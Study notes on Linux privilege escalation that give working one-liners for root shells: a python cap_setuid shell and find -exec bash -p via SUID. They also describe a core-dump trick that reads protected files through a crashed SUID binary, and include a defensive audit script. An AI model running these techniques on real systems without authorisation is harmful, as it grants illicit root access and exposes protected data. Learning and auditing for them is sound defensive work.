Linux Privilege Escalation
- Linux Capabilities (getcap)
- sudo -ln (lists your sudo rules without prompting for a password, useful when you have a shell but no password; use sudo -l when you know the password)
- check /opt and ~/
- SUID files
- cron-executed files
To get the capabilities of a binary, use the getcap command. For example, to check one binary:
getcap /usr/bin/python3.8
or, to list every file on the system that carries capabilities:
getcap -r / 2>/dev/null
If it returns
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
you are able to abuse cap_setuid, as follows:
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Files with the SUID bit set execute as the file's owner rather than as the invoking user. If such a binary has the ability to execute a command, as find does with -exec, you may be able to use it to execute commands as root:
find . -exec /bin/bash -p \;
(bash needs -p to keep the elevated effective UID, otherwise it drops back to your own; if find is instead runnable through sudo, the same -exec works as sudo find . -exec /bin/bash \;)
To find SUID files, execute the following command:
find / -perm -u=s -type f 2>/dev/null
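The same two enumeration steps (capabilities and SUID files) are what a defender should audit on a build image or a host. The script below is an added example, not part of these notes: it parses the output of getcap -r / and of the SUID find command, and prints only the entries that matter. The function names, the --scan flag and the SUID_BASELINE list are this example's own choices; the baseline is a constructed sample that you would replace with the list from a known-good image.

```shell
#!/bin/sh
# Added audit helper (not from the original notes). Function names, the
# --scan flag and the SUID_BASELINE list are this example's own choices.
# It reviews the same two things the notes above enumerate: file
# capabilities that amount to root, and SUID binaries outside a baseline.

# flag_risky_caps: reads `getcap -r /` lines on stdin and prints only those
# granting a capability that lets the invoker become root or read any file.
# Matching on the capability names makes it work with both output formats:
# "path = caps+eip" (libcap < 2.41) and "path caps=eip" (libcap >= 2.41).
flag_risky_caps() {
    grep -E -w 'cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'
}

# Constructed baseline of SUID-root binaries expected on a typical
# Debian/Ubuntu host. Paths differ per distribution: regenerate it from a
# known-good image rather than trusting this sample.
SUID_BASELINE='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/fusermount3'

# unexpected_suid: reads SUID file paths on stdin (one per line) and prints
# those absent from SUID_BASELINE. A stray find, python or bash here is
# exactly the misconfiguration the notes above exploit.
unexpected_suid() {
    while IFS= read -r path; do
        printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path" || printf '%s\n' "$path"
    done
}

# Live scan of this host, only when explicitly asked for (./audit.sh --scan).
case "${1:-}" in
    --scan)
        echo '== file capabilities that amount to root =='
        getcap -r / 2>/dev/null | flag_risky_caps
        echo '== SUID files outside the baseline =='
        find / -perm -4000 -type f 2>/dev/null | unexpected_suid
        ;;
esac
```

Run it with --scan on the host under review, or feed it saved getcap/find output from many hosts through a pipe; anything it prints is either a deliberate exception to document or a finding to remove (setcap -r for a capability, chmod u-s for a SUID bit).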
(Likely) one-off privilege escalation techniques to provide future inspiration.
Situation: A SUID executable reads a file into memory that you lack permission to read, and the executable has core dump generation enabled (its source code contains prctl(PR_SET_DUMPABLE, 1), or a valgrind file hints at it). Note: Using GDB to debug the SUID executable will not help, because under GDB the executable does not gain privilege; it runs at your current permission level.
Run the SUID executable to the point where it has read the file. Once the file is read, background the process with ctrl + Z, use ps to locate the executable's PID, and then send SIGSEGV to cause a segmentation fault:
kill -SIGSEGV [PID]
Finally, execute fg to resume (and crash) the process, resulting in a crash file appearing (/var/crash/_path_to_executable.uid.crash).
Use apport-unpack to unpack the crash information into a new folder:
apport-unpack /tmp/_path_to_executable.uid.crash /tmp/mycrash
Switch to the /tmp/mycrash directory.
[figure: apport-unpack output]
Explore the content of the CoreDump using a command such as
strings CoreDump
Hopefully, the file content you are looking for will appear.